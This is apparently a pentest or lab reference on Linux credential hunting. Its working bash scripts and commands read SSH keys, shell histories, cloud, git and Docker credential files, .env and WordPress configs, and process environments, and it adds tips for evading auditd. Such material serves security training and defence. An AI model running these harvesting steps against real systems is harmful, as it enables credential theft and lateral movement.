Password and Key Hunting
#Overview
Linux systems store credentials in predictable locations: SSH keys, web application configs, history files, and system credential stores. A systematic search of these locations often yields passwords and keys for privilege escalation or lateral movement without requiring any exploit.
#Prerequisites
- Shell access to the target
- Standard tools: find, grep, cat
#Detection & Enumeration
#SSH Key Discovery
# Find all SSH private keys
find / -name id_rsa 2>/dev/null
find / -name id_ecdsa 2>/dev/null
find / -name id_ed25519 2>/dev/null
find / -name "*.pem" 2>/dev/null
# Check ~/.ssh for all users
ls -la /home/*/.ssh/
ls -la /root/.ssh/
# Check authorized_keys (who CAN connect)
cat /home/*/.ssh/authorized_keys
cat /root/.ssh/authorized_keys
BASH
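The finds above only catch keys that kept their default names. The script below is an added example, not part of the original notes: it locates private keys by their header text (so `backup.txt`, `deploy.key` or a PuTTY `.ppk` are found too) and tells you whether each key is usable as-is or passphrase-protected, which decides between `ssh -i` and a detour through `ssh2john`. The sample key files it builds are constructed; their base64 payloads are fake and only carry the fields the check inspects.

```bash
#!/usr/bin/env bash
# Added example (not from the original notes): find private keys by content
# rather than by file name, then report whether each one is plaintext or
# passphrase-protected. Sample key files below are constructed; the base64
# payloads are fake and only reproduce the fields the check looks at.

# Files under the given roots that carry a PEM/OpenSSH or PuTTY key header.
# -I skips binaries, -l prints names only; unreadable paths are silenced.
find_private_keys() {
  grep -rlI -e '-----BEGIN [A-Z ]*PRIVATE KEY-----' -e '^PuTTY-User-Key-File-' -- "$@" 2>/dev/null || true
}

# Print "<path> <format> <plaintext|encrypted>" for one key file.
classify_key() {
  local f="$1" type enc="plaintext"
  if head -n1 "$f" | grep -q '^PuTTY-User-Key-File-'; then
    type=PPK
    grep -q '^Encryption: none' "$f" || enc="encrypted"
  else
    # "-----BEGIN RSA PRIVATE KEY-----" -> RSA, "-----BEGIN PRIVATE KEY-----" -> PKCS8
    type=$(sed -n 's/^-----BEGIN \(.*\)PRIVATE KEY-----$/\1/p' "$f" | head -n1 | sed 's/ $//')
    [ -n "$type" ] || type=PKCS8
    case "$type" in
      ENCRYPTED)                          # PKCS#8 encrypted container
        enc="encrypted" ;;
      OPENSSH)
        # New OpenSSH format: the base64 payload starts with "openssh-key-v1",
        # then the cipher and KDF names. Unencrypted keys say "none" for both;
        # passphrase-protected keys name the KDF "bcrypt".
        if awk '/^-----BEGIN/{p=1;next} /^-----END/{p=0} p' "$f" | base64 -d 2>/dev/null \
             | tr -cd '[:print:]' | grep -q bcrypt; then
          enc="encrypted"
        fi ;;
      *)
        # Legacy PEM (RSA/EC/DSA) flags encryption in a header line.
        if grep -q '^Proc-Type: 4,ENCRYPTED' "$f"; then enc="encrypted"; fi ;;
    esac
  fi
  printf '%s %s %s\n' "$f" "$type" "$enc"
}

# Scan the given roots and classify every hit. Plaintext keys work directly
# with `ssh -i`; encrypted ones go through ssh2john and a cracker first.
hunt_keys() {
  local f
  find_private_keys "$@" | while IFS= read -r f; do classify_key "$f"; done
}

# Constructed sample tree: four key files, three of them under non-obvious names.
make_sample_keys() {
  local root="$1"
  mkdir -p "$root/home/bob/.ssh" "$root/var/backups"
  printf '%s\n' '-----BEGIN RSA PRIVATE KEY-----' 'Proc-Type: 4,ENCRYPTED' \
    'DEK-Info: AES-128-CBC,0123456789ABCDEF' '' 'QUJDREVG' \
    '-----END RSA PRIVATE KEY-----' > "$root/home/bob/.ssh/id_rsa"
  printf '%s\n' '-----BEGIN OPENSSH PRIVATE KEY-----' \
    "$(printf 'openssh-key-v1 none none ssh-ed25519' | base64)" \
    '-----END OPENSSH PRIVATE KEY-----' > "$root/var/backups/deploy.txt"
  printf '%s\n' '-----BEGIN OPENSSH PRIVATE KEY-----' \
    "$(printf 'openssh-key-v1 aes256-ctr bcrypt' | base64)" \
    '-----END OPENSSH PRIVATE KEY-----' > "$root/var/backups/old.key"
  printf '%s\n' 'PuTTY-User-Key-File-3: ssh-rsa' 'Encryption: none' 'Comment: win-admin' \
    > "$root/var/backups/admin.ppk"
  printf '%s\n' 'nothing to see here' > "$root/var/backups/README"
}

if [ "$#" -gt 0 ]; then
  hunt_keys "$@"                  # e.g. ./hunt_keys.sh /home /root /var /opt /etc/ssh
else
  demo=$(mktemp -d) && make_sample_keys "$demo" && hunt_keys "$demo"
  rm -rf "$demo"
fi
```

Run it with the directories you would search first (`/home /root /var /opt /etc/ssh`) before resorting to `/`; with no arguments it runs against the constructed sample tree. A plaintext hit still has to be matched against an `authorized_keys` entry somewhere before it is worth anything.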
#Config File Password Search
# Broad password search in web directories (-i: config keys vary in case)
# The -v filter drops PHP's password_hash()/password_verify() calls and empty($password) checks, which are code, not credentials
grep -ri "password" /var/www/ 2>/dev/null | grep -v "password_hash\|password_verify\|empty("
grep -ri "passwd" /var/www/ 2>/dev/null
grep -ri "DB_PASSWORD\|DB_USER\|DB_HOST" /var/www/ 2>/dev/null
# Search for specific patterns
grep -ri "pwd=" /var/www/ 2>/dev/null
grep -ri "secret" /var/www/ --include="*.php" 2>/dev/null
grep -ri "token" /var/www/ --include="*.php" 2>/dev/null
grep -ri "api_key" /var/www/ 2>/dev/null
BASH
#History Files
# Shell histories
cat ~/.bash_history
cat ~/.zsh_history
cat ~/.mysql_history
cat ~/.psql_history
cat ~/.python_history
cat ~/.node_repl_history
cat ~/.lesshst
cat ~/.viminfo
# All users' histories
cat /home/*/.bash_history
find /home -name ".bash_history" -exec cat {} \; 2>/dev/null
BASH
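Dumping histories with `cat` works on a lab box; on a real host the interesting lines are a handful among thousands, and zsh with EXTENDED_HISTORY prefixes every entry with `: <epoch>:<duration>;`, which breaks patterns anchored on the command name. The script below is an added example, not part of the original notes: it normalizes that prefix and filters the history files of root and every user under /home for commands that carried a secret on the command line. The sample history files it creates are constructed.

```bash
#!/usr/bin/env bash
# Added example (not from the original notes): mine shell and REPL history
# files for commands that carried a secret on the command line. Handles the
# zsh EXTENDED_HISTORY prefix (": <epoch>:<dur>;") that plain greps trip over.
# Sample data below is constructed.

# ERE for the usual "secret on the command line" shapes. "mysql ... -pX"
# (no space) is a password; "mysql ... -p" alone prompts and is not matched.
CRED_PATTERN='sshpass -p|mysql[^|]* -p[^ ]|--password=|PGPASSWORD=|MYSQL_PWD=|curl[^|]* -u [^ ]+:|smbclient[^|]*-U [^ ]+%|https?://[^/ @]+:[^@ ]+@|IDENTIFIED BY|echo [^|]*\| *sudo -S|export +[A-Z_]*(PASS|SECRET|TOKEN|KEY)[A-Z_]*='

# Turn zsh extended-history lines into plain commands; other formats pass through.
normalize_history() {
  sed -E 's/^: [0-9]+:[0-9]+;//' "$1"
}

# Print matching commands from one history file, prefixed with the file name.
mine_history() {
  local f="$1"
  [ -r "$f" ] || return 0
  normalize_history "$f" | grep -E -- "$CRED_PATTERN" | awk -v f="$f" '{ print f ": " $0 }' || true
}

# Walk the history files of root and of every user under $root/home.
# $root defaults to / ; pass a mount point to scan a disk image offline.
mine_all_histories() {
  local root="${1:-}" home f
  for home in "$root"/root "$root"/home/*; do
    [ -d "$home" ] || continue
    for f in .bash_history .zsh_history .sh_history .mysql_history .psql_history \
             .python_history .node_repl_history .lesshst; do
      mine_history "$home/$f"
    done
  done
}

# Constructed sample tree so the example runs without a real target.
make_sample_histories() {
  local root="$1"
  mkdir -p "$root/home/alice" "$root/root"
  printf '%s\n' 'ls -la' 'mysql -u root -pS3cr3t! shop' 'mysql -u root -p' \
    > "$root/home/alice/.bash_history"
  printf '%s\n' ': 1700000000:0;sshpass -p Winter2024 ssh deploy@10.10.10.5' \
    ': 1700000001:0;cd /tmp' > "$root/home/alice/.zsh_history"
  printf '%s\n' "CREATE USER 'app'@'%' IDENTIFIED BY 'AppPass1';" 'SELECT 1;' \
    > "$root/home/alice/.mysql_history"
  printf '%s\n' 'export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI' > "$root/root/.bash_history"
}

if [ "$#" -gt 0 ]; then
  mine_all_histories "$1"         # e.g. ./hunt_history.sh /   or   ./hunt_history.sh /mnt/image
else
  demo=$(mktemp -d) && make_sample_histories "$demo" && mine_all_histories "$demo"
  rm -rf "$demo"
fi
```

The pattern list is deliberately conservative (it will not flag `mkdir -p` or a bare `mysql -p` prompt); extend CRED_PATTERN with whatever tooling the target's admins use. History files of other users are normally mode 0600, so expect hits only for your own account until you have escalated.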
#Stored Credential Files
# Git credentials (credential.helper=store writes https://user:token@host lines in plaintext)
cat ~/.git-credentials
cat ~/.gitconfig
# Docker registry logins ("auth" fields are base64 of user:password)
cat ~/.docker/config.json
# Cloud credentials
cat ~/.aws/config
cat ~/.aws/credentials
strings ~/.config/gcloud/credentials.db   # SQLite database, cat only shows garbage
cat ~/.azure/accessTokens.json            # older Azure CLI versions; newer ones keep an MSAL token cache in the same directory
# FTP/HTTP logins (.netrc is also read by curl, wget and git)
cat ~/.netrc
cat ~/.lftp/rc
BASH
#.env Files in Web Directories
# Find all .env files (Laravel, Symfony, Node.js apps)
find /var/www/ -name ".env" 2>/dev/null
find / -name ".env" -not -path "/proc/*" 2>/dev/null
# Find config files with database credentials
find /var/www/ -name "*.config" -o -name "*.ini" -o -name "*.conf" 2>/dev/null
BASH
#Backup Files with Credentials
# Old configuration files often contain unredacted passwords
find /var/www/ -name "*.bak" -o -name "*.old" -o -name "*.backup" -o -name "*.orig" 2>/dev/null
find / -name "*.sql" -o -name "*.sql.gz" -o -name "*.sql.bz2" 2>/dev/null
# WordPress backups
find /var/www/ -name "wp-config.php*" 2>/dev/null
BASH
#Apache/Nginx Config
# Check site configs for credentials
cat /etc/apache2/sites-enabled/*.conf | grep -i password
cat /etc/nginx/sites-enabled/* | grep -i password
# .htpasswd files
find / -name ".htpasswd" 2>/dev/null
BASH
#Common Pitfalls
- Case sensitivity: "password", "Password" and "PASSWORD" all occur in the wild -- use grep -i rather than searching each spelling separately
- grep -r without redirecting stderr fills the output with "Permission denied" -- always append 2>/dev/null
- Config files may reference environment variables (DB_PASSWORD=${DB_PASS}) -- check both the config and the environment of the running process (/proc/<pid>/environ is readable when the process runs as your uid; systemd units may point to an EnvironmentFile=)
- A private key found as www-data is only useful where its public key sits in an authorized_keys file: run ssh-keygen -y -f <key> and compare the output against authorized_keys for root and the other users on this host and on neighbouring hosts; a passphrase-protected key has to be cracked first (ssh2john, then john or hashcat)
- Some config files are stored outside /var/www/ -- check /opt, /srv, /etc and the home directory of the service account for custom applications
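Putting the .env section and the environment-variable pitfall together: a grep for DB_PASSWORD in a Laravel .env or a wp-config.php.bak returns the line, but `DB_PASSWORD=${DB_PASS}` is only half an answer until DB_PASS is looked up. The script below is an added example, not part of the original notes: it normalizes dotenv / ini / properties / `define()` style files to KEY=value lines, resolves `${VAR}` references from a dump of the application's environment (assumed to come from `tr '\0' '\n' </proc/<pid>/environ`, readable when the process runs as your uid, e.g. php-fpm workers as www-data) and from earlier lines of the same file, and reports only the credential-looking names. The config files it creates are constructed.

```bash
#!/usr/bin/env bash
# Added example (not from the original notes): extract credential-looking
# settings from config files and resolve ${VAR} references from a process
# environment dump. File contents below are constructed; the environment dump
# is assumed to be `tr '\0' '\n' </proc/<pid>/environ` of the running app.

# Setting names worth reporting (case-insensitive ERE).
SECRET_KEYS='PASS|PASSWORD|PWD|SECRET|TOKEN|KEY|CREDENTIAL|AUTH'

# Normalize one file to KEY=value lines. Handles
#   KEY=value   KEY="value"   export KEY='value'   key = value  # inline comment
#   define('KEY', 'value');   (wp-config.php and friends)
# Comment lines (#, ;, //) are dropped and one layer of quotes removed.
# PHP "$var = 'x';" assignments are not handled.
extract_settings() {
  awk -v q="'" '
    function trim(s) { sub(/^[ \t]+/, "", s); sub(/[ \t]+$/, "", s); return s }
    function unquote(s,  c) {
      s = trim(s); c = substr(s, 1, 1)
      if (length(s) >= 2 && (c == q || c == "\"") && substr(s, length(s), 1) == c)
        return substr(s, 2, length(s) - 2)
      sub(/[ \t]+#.*$/, "", s)            # unquoted values end at an inline comment
      return s
    }
    /^[ \t]*(#|;|\/\/)/ { next }
    /^[ \t]*define[ \t]*\(/ {
      s = $0
      sub(/^[ \t]*define[ \t]*\(/, "", s)
      sub(/\)[ \t]*;?[ \t]*$/, "", s)
      i = index(s, ",")
      if (i > 0) print unquote(substr(s, 1, i - 1)) "=" unquote(substr(s, i + 1))
      next
    }
    /^[ \t]*(export[ \t]+)?[A-Za-z_][A-Za-z0-9_.]*[ \t]*=/ {
      s = $0
      sub(/^[ \t]*export[ \t]+/, "", s)
      i = index(s, "=")
      print trim(substr(s, 1, i - 1)) "=" unquote(substr(s, i + 1))
    }
  ' "$1"
}

# Resolve ${VAR} and $VAR in values, first from the environment dump ($1),
# then from earlier lines of the same config (dotenv files reference their
# own variables). Unresolved references are kept verbatim so the output
# shows what still has to be hunted down.
resolve_refs() {
  awk -v envfile="${1:-/dev/null}" '
    BEGIN {
      while ((getline l < envfile) > 0) {
        i = index(l, "="); if (i > 0) env[substr(l, 1, i - 1)] = substr(l, i + 1)
      }
      close(envfile)
    }
    {
      i = index($0, "="); key = substr($0, 1, i - 1); rest = substr($0, i + 1); out = ""
      while (match(rest, /\$[{][A-Za-z_][A-Za-z0-9_]*[}]|\$[A-Za-z_][A-Za-z0-9_]*/)) {
        ref = substr(rest, RSTART, RLENGTH); name = ref; gsub(/[${}]/, "", name)
        out = out substr(rest, 1, RSTART - 1) ((name in env) ? env[name] : ref)
        rest = substr(rest, RSTART + RLENGTH)
      }
      out = out rest
      if (!(key in env)) env[key] = out
      print key "=" out
    }
  '
}

# Report credential-like settings from one config file, resolved against an
# optional environment dump. Usage: hunt_config <config> [<env-dump>]
hunt_config() {
  extract_settings "$1" | resolve_refs "${2:-/dev/null}" | grep -Ei "^[^=]*($SECRET_KEYS)[^=]*=" || true
}

# Constructed samples: a Laravel-style .env, the app's environment, and a
# wp-config.php backup left next to the live one.
make_sample_configs() {
  local dir="$1"
  printf '%s\n' '# app settings' 'APP_NAME=Shop' 'APP_KEY=base64:c2VjcmV0' 'DB_HOST=127.0.0.1' \
    'DB_USERNAME="shop"' 'DB_PASSWORD=${DB_SECRET}   # from the unit file' \
    "export MAIL_PASSWORD='m@il pass'" 'REDIS_PASSWORD=${REDIS_PASS}' > "$dir/.env"
  printf '%s\n' 'DB_SECRET=Sup3rS3cret' 'PATH=/usr/bin' > "$dir/environ.txt"
  printf '%s\n' '<?php' "define( 'DB_NAME', 'wordpress' );" "define( 'DB_USER', 'wp' );" \
    "define( 'DB_PASSWORD', 'Wordpass1!' );" "define('DB_HOST', 'localhost');" > "$dir/wp-config.php.bak"
}

if [ "$#" -gt 0 ]; then
  hunt_config "$@"    # e.g. hunt_config /var/www/app/.env <(tr '\0' '\n' </proc/1234/environ)
else
  demo=$(mktemp -d) && make_sample_configs "$demo"
  hunt_config "$demo/.env" "$demo/environ.txt"
  hunt_config "$demo/wp-config.php.bak"
  rm -rf "$demo"
fi
```

Against the constructed .env the output shows DB_PASSWORD resolved to the value from the environment dump, MAIL_PASSWORD with its quotes stripped, and REDIS_PASSWORD=${REDIS_PASS} left as-is, which is your cue to go and find REDIS_PASS (another .env, a systemd EnvironmentFile, the parent process's environment). Run it without the env-dump argument and DB_PASSWORD stays unresolved too, which is the pitfall the list above describes.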
#OPSEC Considerations
- File reads by themselves are low noise: they leave no log entry unless auditd (or an EDR file-access rule) watches the path.
- find / -name id_rsa traverses the entire filesystem and generates significant disk I/O -- it may stand out on heavily monitored systems, so search the likely roots (/home, /root, /var/www, /opt, /etc) first.
- Reading other users' .bash_history may be logged if auditd is configured to watch those files.
- grep -r across large directories generates many file open/read calls -- consider using more targeted searches first.
#Post-Exploitation Value
SSH keys provide passwordless access to other systems. Database credentials in config files enable lateral movement and data exfiltration. Git credentials provide access to source code repositories and potentially more credentials. Cloud credentials provide access to external infrastructure.
#Cross-References
#Source Machines
- Intentions (Hard, Linux) - SSH key exfiltration via capability abuse
- Monitored (Medium, Linux) - SSH key exfiltration via symlink in sudo-allowed script
- Cerberus (Hard, Linux) - SSSD cache credential cracking